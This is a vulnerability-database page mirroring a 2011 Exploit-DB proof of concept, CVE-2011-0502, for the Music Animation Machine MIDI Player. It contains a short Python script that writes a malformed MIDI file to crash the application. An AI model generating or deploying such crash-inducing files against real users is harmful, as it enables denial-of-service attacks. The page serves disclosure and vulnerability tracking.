Lucene search
+L

Music Animation Machine MIDI Player - Local Crash (PoC)

🗓️ 03 Jan 2011 00:00:00Reported by c0d3R'ZType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 24 Views

Music Animation Machine MIDI Player Local Crash Po

Related
Code
ReporterTitlePublishedViews
Family
circl
Circl
CVE-2011-0502
3 Jan 201100:00
circl
cve
CVE
CVE-2011-0502
20 Jan 201118:00
cve
cvelist
Cvelist
CVE-2011-0502
20 Jan 201118:00
cvelist
euvd
EUVD
EUVD-2011-0522
7 Oct 202500:30
euvd
nvd
NVD
CVE-2011-0502
20 Jan 201119:00
nvd
prion
Prion
Design/Logic Flaw
20 Jan 201119:00
prion
redhatcve
RedhatCVE
CVE-2011-0502
22 May 202503:20
redhatcve
# Exploit Title: Music Animation Machine MIDI Player Local Crash PoC
# Date: 1/3/2011
# Author: c0d3R'Z
# Software Link: http://www.musanim.com/player/MAMPlayer2006aug19_035.zip
# Version: Release 035
# Tested on: Windows XP SP2 EN (VirtualBox)


# The application crashes when trys to convert a malformed midi file

#!/usr/bin/python

buffer     = "\x31\x33\x33\x37" * 1337

try:
    f = open("test.mid",'w')
    f.write(buffer)
    f.close()

    print " Vulnerable file created!..."
    print " Open the mid file with the application and Voila!! , it crashes!!\n"
except:
    print "[-] Error occured!"

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

03 Jan 2011 00:00Current
5.2Medium risk
Vulners AI Score5.2
CVSS 29.3
EPSS0.05704
24